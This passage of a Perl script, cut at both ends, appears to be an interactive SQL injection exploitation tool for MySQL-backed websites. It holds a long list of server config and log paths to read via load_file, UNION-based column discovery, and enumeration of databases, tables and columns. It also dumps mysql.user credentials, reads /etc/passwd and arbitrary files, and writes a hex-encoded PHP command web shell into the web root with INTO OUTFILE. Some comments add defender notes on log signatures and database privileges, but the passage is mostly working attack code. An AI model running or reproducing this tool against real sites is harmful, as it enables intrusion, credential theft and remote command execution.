'/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\m
y.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

    use LWP::UserAgent;
    use URI::Split qw(uri_split);

    # Start-up: create the log directories, build the shared HTTP client, show
    # the banner, then either prompt interactively or scan the command-line target.
    installer();

    # One LWP::UserAgent is shared by every request (toma() reads $nave).
    # Defender note: the 5-second timeout and this fixed, very old Firefox 2.0
    # User-Agent string are constant across all requests the script sends, which
    # makes them a usable signature in web-server and WAF logs.
    my $nave = LWP::UserAgent->new();
    $nave->timeout(5);
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

    &head;
    unless(@ARGV == 2) {
    &menu;
    } else {
    &scan($ARGV[0],$ARVG[1]);
    }
    &finish;

    # menu(): interactive entry point. Reads the target URL and the separator
    # style from STDIN and passes both to scan().
    sub menu {
    print "[Page] : ";
    my $page = <STDIN>;
    chomp($page);
    print "\n[Bypass : -- /* %20] : ";
    my $bypass = <STDIN>;
    chomp($bypass);
    print "\n\n";
    scan($page, $bypass);
    }

    # scan($page, $bypass): decide whether $page looks injectable and hand over
    # to motor() or back to the menu.
    #
    # The test is boolean-based: the same URL is requested twice, once with
    # "and 1=0" and once with "and 1=1" appended (joined with the separators
    # returned by bypass()). Different response bodies are taken as evidence that
    # the appended condition reached the SQL statement.
    #
    # Defender note: with parameterized queries both requests return the same
    # page. In access logs the pair shows up as two near-identical requests that
    # differ only in "1=0" / "1=1", sent back to back from one client.
    sub scan {
    my $page = $_[0];
    print "[Status] : Scanning.....\n";
    ($pass1,$bypass2) = &bypass($_[1]);
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;   # the URL authority (host[:port]) names the per-target log file

    # A URL that already contains the "hackman" placeholder skips detection and
    # goes straight to the options menu.
    if ($_[0]=~/hackman/ig) {
    savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
    &menu_options($_[0],$pass,$save);
    }

    my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
    my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);

    unless ($testar1 eq $testar2) {
    motor($page,$_[1]);
    } else {
    print "\n[-] Not vulnerable\n\n";
    print "[+] Scan anyway y/n : ";
    chomp(my $op = <stdin>);
    if ($op eq "y") {
    motor($page,$_[1]);
    } else {
    head();
    menu();
    }
    }

    }

    # motor($page, $bypass): run the column-count search and, if it succeeded,
    # open the options menu with the generated URL; otherwise wait for Enter and
    # return to the start menu.
    sub motor {

    # The leading "&" is required here: without it Perl would call the built-in
    # length() instead of the sub of the same name defined in this file.
    my ($gen,$save,$control) = &length($_[0],$_[1]);

    if ($control eq 1) {
    print "[Status] : Enjoy the menu\n\n";
    &menu_options($gen,$pass,$save);
    } else {
    print "[Status] : Length columns not found\n\n";
    <STDIN>;
    &head;
    &menu;
    }
    }

    sub head {
    system 'cls';
    print qq(


    @      @@   @             
    @@     @  @ @@             
    @ @@  @  @  @ @   @ @ @@@
    @ @   @  @  @@ @ @@@ @  @
    @@    @  @  @  @  @   @@@
    @ @   @  @  @  @  @  @  @
    @@@ @   @@   @@@  @@@ @@@@@




    );
    }

    # length($page, $bypass): find how many columns the injectable query returns
    # and which of them is reflected in the page.
    #
    # For n = 2..200 it requests $page with "1 and 1=0 union select <n values>"
    # appended. Every value is a char(...) expression that spells
    # RATSXPDOWN<position>RATSXPDOWN, so when the marker appears in the response
    # the number between the markers identifies the reflected column.
    #
    # Returns (url_with_placeholder, log_name, 1) on success, where the reflected
    # position in the select list has been replaced by the literal "hackman".
    # If the loop finishes without a match the sub falls off the end.
    #
    # Defender note: one run can produce up to 199 consecutive requests whose
    # query string contains "union" + "select" and a growing list of char(...)
    # calls. That pattern, and the RATSXPDOWN marker in responses, are
    # straightforward WAF/log detections.
    sub length {
    print "\n[+] Looking for the number of columns\n\n";
    my $rows  = "0";
    my $asc;
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[1]);

    $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
    $total = "1";
    for my $rows(2..200) {
    $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
    $total.= ",".$rows;
    $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
    $test = toma($injection);
    if ($test=~/RATSXPDOWN/) {
    # All reflected positions; only the first one is used below.
    @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
    $control = 1;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    savefile($save.".txt","\n[Target confirmed] : $page");
    savefile($save.".txt","[Bypass] : $_[1]\n");
    savefile($save.".txt","[Limit] : The site has $rows columns");
    savefile($save.".txt","[Data] : The number @number print data");
    # $total is the plain list "1,2,...,n"; the first occurrence of the
    # reflected number becomes the placeholder.
    $total=~s/$number[0]/hackman/;
    savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
    return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
    }
    }
    }

    # details($page, $bypass, $save): report what the injected query is allowed
    # to read, and log the results to "$save.txt".
    #
    # $page must contain the "hackman" placeholder; the text before and after it
    # becomes $start / $end. Three probes substitute a marker expression
    # (char(69,82,84,79,82,56,53,52) spells ERTOR854) and check whether the
    # marker comes back:
    #   - selecting from information_schema.tables
    #   - selecting from mysql.user
    #   - load_file() on the hex literal 0x2f6574632f706173737764 (/etc/passwd)
    # A fourth request concatenates version(), database() and user().
    #
    # Defender note: each "ON" corresponds to a privilege the application's
    # database account should not hold. An account limited to its own schema,
    # with no SELECT on mysql.* and no FILE privilege, turns the mysql.user and
    # load_file probes into "OFF".
    sub details {
    my ($page,$bypass,$save) = @_;
    ($pass1,$pass2) = &bypass($bypass);
    savefile($save.".txt","\n");
    if ($page=~/(.*)hackman(.*)/ig) {
    print "[+] Searching information..\n\n";
    my  ($start,$end) = ($1,$2);
    $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
    $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
    $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    $test1 = toma($inforschema);
    $test2 = toma($mysqluser);
    if ($test2=~/ERTOR854/ig) {
    savefile($save.".txt","[mysql.user] : ON");
    print "[mysql.user] : ON\n";
    } else {
    print "[mysql.user] : OFF\n";
    savefile($save.".txt","[mysql.user] : OFF");
    }
    if ($test1=~/ERTOR854/ig) {
    print "[information_schema.tables] : ON\n";
    savefile($save.".txt","[information_schema.tables] : ON");
    } else {
    print "[information_schema.tables] : OFF\n";
    savefile($save.".txt","[information_schema.tables] : OFF");
    }
    # No OFF branch here: a failed load_file probe is simply not reported.
    if ($test3=~/ERTOR854/ig) {
    print "[load_file] : ON\n";
    savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    }
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
    $injection = $start.$concat.$end.$pass2;
    $code = toma($injection);
    # Three captures separated by the marker: version, database name, user.
    if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
    print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
    savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
    } else {
    print "\n[-] Not found any data\n";
    }
    }
    }

    sub menu_options {

    head();

    print "[Target confirmed] : $_[0]\n";
    print "[Bypass] : $_[1]\n\n";

    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    print "[save] : /logs/webs/$save\n\n";
    print "\n--== information_schema.tables ==--\n\n";
    print "[1] : Show tables\n";
    print "[2] : Show columns\n";
    print "[3] : Show DBS\n";
    print "[4] : Show tables with other DB\n";
    print "[5] : Show columns with other DB\n";
    print "\n\n--== mysql.user ==--\n\n";
    print "[6] : Show users\n";
    print "\n--== Others ==--\n\n";
    print "[7] : Fuzzing files with load_file\n";
    print "[8] : Read a file with load_file\n";
    print "[9] : Dump\n";
    print "[10] : Informacion of the server\n";
    print "[11] : Create a shell with into outfile\n";
    print "[12] : Show Log\n";
    print "[13] : Change Target\n";
    print "[14] : Exit\n";
    print "\n\n[Option] : ";
    chomp(my $opcion = <STDIN>);
    if ($opcion eq "1") {
    schematables($_[0],$_[1],$save);
    &reload;
    }
    elsif ($opcion eq "2") {
    print "\n\n[Table] : ";
    chomp(my $tabla = <STDIN>);
    schemacolumns($_[0],$_[1],$save,$tabla);
    &reload;
    }
    elsif ($opcion eq "3") {
    &schemadb($_[0],$_[1],$save);
    &reload;
    }
    elsif ($opcion eq "4") {
    print "\n\n[DAtabase] : ";
    chomp(my $data =<STDIN>);
    &schematablesdb($_[0],$_[1],$data,$save);
    &reload;
    }
    elsif ($opcion eq "5"){
    print "\n\n[DB] : ";
    chomp(my $db =<STDIN>);
    print "\n[Table] : ";
    chomp(my $table =<STDIN>);
    &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
    &reload;
    }
    elsif ($opcion eq "6") {
    &mysqluser($_[0],$_[1],$save);
    &reload;
    }
    elsif ($opcion eq "7") {
    &load($_[0],$_[1],$save);
    &reload;
    }
    elsif ($opcion eq "8") { ########################################
    &loadfile($_[0],$_[1],$save);
    &reload;
    }
    elsif ($opcion eq "9") {
    print "\n\n[Table to dump] : ";
    chomp(my $tabla = <STDIN>);
    print "\n[Column 1] : ";
    chomp(my $col1 = <STDIN>);
    print "\n[Column 2] : ";
    chomp(my $col2 = <STDIN>);
    print "\n\n";
    &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
    &reload;
    }
    elsif ($opcion eq "10") {
    print "\n\n";
    &details($_[0],$_[1],$save);
    &reload;
    }
    elsif ($opcion eq "11") {
    print "\n\n[Full Path Discloure] : ";
    chomp(my $path = <STDIN>);
    &into($_[0],$_[1],$path,$save);
    &reload;
    }
    elsif ($opcion eq "12") {
    $t = "logs/webs/$save.txt";
    system("start $t");
    &reload;
    }
    elsif ($opcion eq "13") {
    &head;
    &menu;
    }

    elsif ($opcion eq "14") {
    &finish;
    }
    else {
    &reload;
    }
    }

    sub schematables {

    $real = "1";
    my ($page,$bypass,$save) = @_;
    savefile($save.".txt","\n");
    print "\n";
    my $page1 = $page;
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","[DB] : default");
    print "\n[+] Searching tables with schema\n\n";
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $resto = $1;
    $total = $resto - 17;
    print "[+] Tables Length :  $total\n\n";
    savefile($save.".txt","[+] Searching tables with schema\n");
    savefile($save.".txt","[+] Tables Length :  $total\n");
    my $limit = $1;
    for my $limit(17..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    print "[Table $real Found : $table ]\n";
    savefile($save.".txt","[Table $real Found : $table ]");
    $real++;
    }}
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    }
    # reload(): print "Finish", wait for Enter, redraw the banner and show the
    # options menu again.
    sub reload {
    print "\n\n[+] Finish\n\n";
    <STDIN>;
    &head;
    # "&name;" with no parentheses calls the sub with the caller's current @_.
    # menu_options invokes this sub as "&reload;", so its own arguments (URL,
    # bypass, ...) flow through reload and back into menu_options here.
    &menu_options;
    }


    sub schemacolumns {
    my ($page,$bypass,$save,$table) = @_;
    my $page3 = $page;
    my $page4 = $page;
    savefile($save.".txt","\n");
    print "\n";
    ($pass1,$pass2) = &bypass($bypass);
    print "\n[DB] : default\n";
    savefile($save.".txt","[DB] : default");
    savefile($save.".txt","[Table] : $table\n");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns Length : $1 ]\n\n";
    savefile($save.".txt","[Columns Length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }}
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    sub schemadb {
    my ($page,$bypass,$save) = @_;
    my $page1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Searching DBS\n\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $limita = $1;
    print "[+] Databases Length : $limita\n\n";
    savefile($save.".txt","[+] Databases Length : $limita\n");
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit(0..$limita) {
    $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $control = $1;
    if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
    print "[Database $real Found] $control\n";
    savefile($save.".txt","[Database $real Found] : $control");
    $real++;
    }
    }
    }
    } else {
    print "[-] information_schema = ERROR\n";
    }
    }

    sub schematablesdb {
    my $page = $_[0];
    my $db = $_[2];
    my $page1 = $page;
    savefile($_[3].".txt","\n");
    print "\n\n[+] Searching tables with DB $db\n\n";
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($_[3].".txt","[DB] : $db");
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
    print "[+] Tables Length :  $1\n\n";
    savefile($_[3].".txt","[+] Tables Length :  $1\n");
    my $limit = $1;
    $real = "1";
    for my $lim(0..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    savefile($_[3].".txt","[Table $real Found : $table ]");
    print "[Table $real Found : $table ]\n";
    $real++;
    }}
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    sub schemacolumnsdb {
    my ($page,$bypass,$db,$table,$save) = @_;
    my $page3 = $page;
    my $page4 = $page;
    print "\n\n[+] Searching columns in table $table with DB $db\n\n";
    savefile($save.".txt","\n");
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","\n[DB] : $db");
    savefile($save.".txt","[Table] : $table");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns length : $1 ]\n\n";
    savefile($save.".txt","[Columns length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }
    }
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    }

    sub mysqluser {
    my ($page,$bypass,$save) = @_;
    my $cop = $page;
    my $cop1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Finding mysql.users\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code=~/RATSXPDOWN/ig){
    $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n\n[+] Users Found : $1\n\n";
    savefile($save.".txt","\n[+] Users mysql Found : $1\n");
    for my $limit(0..$1) {
    $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
    $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
    print "[Host] : $1 [User] : $2 [Password] : $3\n";
    savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
    } else {
    &reload;
    }
    }
    }
    } else {
    print "\n[-] mysql.user = ERROR\n";
    }
    }

    sub tabfuzz {
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[1]);
    $count = "0";
    savefile($_[2].".txt","\n");
    print "\n";
    if ($_[0] =~/(.*)hackman(.*)/g) {
    my $start = $1; my $end = $2;
    print "\n\n[+] Searching tables.....\n\n";
    for my $table(@buscar2) {
    chomp $table;
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
    $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
    $code = toma($injection);
    if ($code =~/ERTOR854/g) {
    $count++;
    print "[Table Found] : $table\n";
    savefile($_[2].".txt","[Table Found] : $table");
    }}}
    if ($count eq "0") { print "[-] Not found any table\n";
    &reload;
    }
    }

    sub colfuzz {
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[1]);
    $count = "0";
    savefile($_[3].".txt","\n");
    print "\n";
    if ($_[0] =~/(.*)hackman(.*)/) {
    my $start = $1; my $end = $2;
    print "[+] Searching columns for the table $_[2]...\n\n";
    savefile($_[3].".txt","[Table] : $_[2]");
    for my $columns(@buscar1) {
    chomp $columns;
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
    $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
    if ($code =~/ERTOR854/g) {
    print "[Column] : $columns\n";
    savefile($_[3].".txt","[Column Found] : $columns");
    }
    }
    } else {
    print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
    }
    }

    sub load {
    savefile($_[2].".txt","\n");
    print "\n";
    ($pass1,$pass2) = &bypass($_[1]);
    if ($_[0] =~/(.*)hackman(.*)/g) {
    print "\n[+] Searching files with load_file...\n\n\n";
    my $start = $1; my $end = $2;
    for my $file(@files) {
    chomp $file;
    $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
    my $code = toma($start.$concat.$end.$pass2);
    chomp $code;
    if ($code=~/k0bra(.*)k0bra/s) {
    print "[File Found] : $file\n";
    print "\n[Source Start]\n\n";
    print $1;
    print "\n\n[Source End]\n\n";
    savefile($_[2].".txt","[File Found] : $file");
    savefile($_[2].".txt","\n[Source Start]\n");
    savefile($_[2].".txt","$1");
    savefile($_[2].".txt","\n[Source End]\n");
    }}}}

    sub loadfile {
    savefile($_[2].".txt","\n");
    ($pass1,$pass2) = &bypass($_[1]);
    if ($_[0] =~/(.*)hackman(.*)/g) {
    my $start = $1; my $end = $2;
    print "\n\n[+] File to read : ";
    chomp (my $file = <stdin>);
    $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
    my $code = toma($start.$concat.$end.$pass2);
    chomp $code;
    if ($code=~/k0bra(.*)k0bra/s) {
    print "[File Found] : $file\n";
    print "\n[Source Start]\n\n";
    print $1;
    print "\n\n[Source End]\n\n";
    savefile($_[2].".txt","[File Found] : $file");
    savefile($_[2].".txt","\n[Source Start]\n");
    savefile($_[2].".txt","$1");
    savefile($_[2].".txt","\n[Source End]\n");
    }}}

    sub dump {
    savefile($_[5].".txt","\n");
    print "\n";
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[4]);
    if ($page=~/(.*)hackman(.*)/){
    my $start = $1;
    my $end = $2;
    print "[+] Extracting values...\n\n";
    $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
    $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
    if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
    $tota = $1;
    print "[+] Table : $_[3]\n";
    print "[+] Length of the rows : $tota\n\n";
    print "[$_[1]] [$_[2]]\n\n";
    savefile($_[5].".txt","[Table] : $_[3]");
    savefile($_[5].".txt","[+] Length of the rows: $tota\n");
    savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
    for my $limit(0..$tota) {
    chomp $limit;
    $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
    savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
    print "[$_[1]] : $1   [$_[2]] : $2\n";
    } else {
    print "\n\n[+] Extracting Finish\n";
    &reload;
    }
    }
    } else {
    print "[-] Not Found any DATA\n\n";
    }}}


    # into($page, $bypass, $dir, $save): attempt to write a PHP file through the
    # injectable query using SELECT ... INTO OUTFILE, then request it over HTTP
    # to see whether it landed inside the web root.
    #
    # $dir is the server-side directory typed by the operator; the hex literal in
    # the request is the content written to "$dir/shell.php" (its title string
    # "Mini Shell By Doddy" is what the follow-up request looks for).
    #
    # Defender note: this step needs all of the following on the database host,
    # and each one is a control point:
    #   - the application's MySQL account holds the FILE privilege;
    #   - secure_file_priv is empty or covers a web-served directory;
    #   - the MySQL service account can write into the web root.
    # A new .php file owned by the database service user inside the document
    # root is a strong indicator of compromise.
    sub into {
    print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
    my ($page,$bypass,$dir,$save) = @_;
    savefile($save.".txt","\n");
    print "\n";
    ($pass1,$pass2) = &bypass($bypass);
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
    if ($path=~/\/(.*)$/) {
    my $path1 = $1;
    my $path2 = $path1;
    $path2 =~s/$1//;
    $dir =~s/$path1//ig;
    $shell = $dir."/"."shell.php";
    if ($page =~/(.*)hackman(.*)/ig) {
    my  ($start,$end) = ($1,$2);
    $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
    # Verification request: success is judged only by the title text coming back.
    $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
    if ($code1=~/Mini Shell By Doddy/ig) {
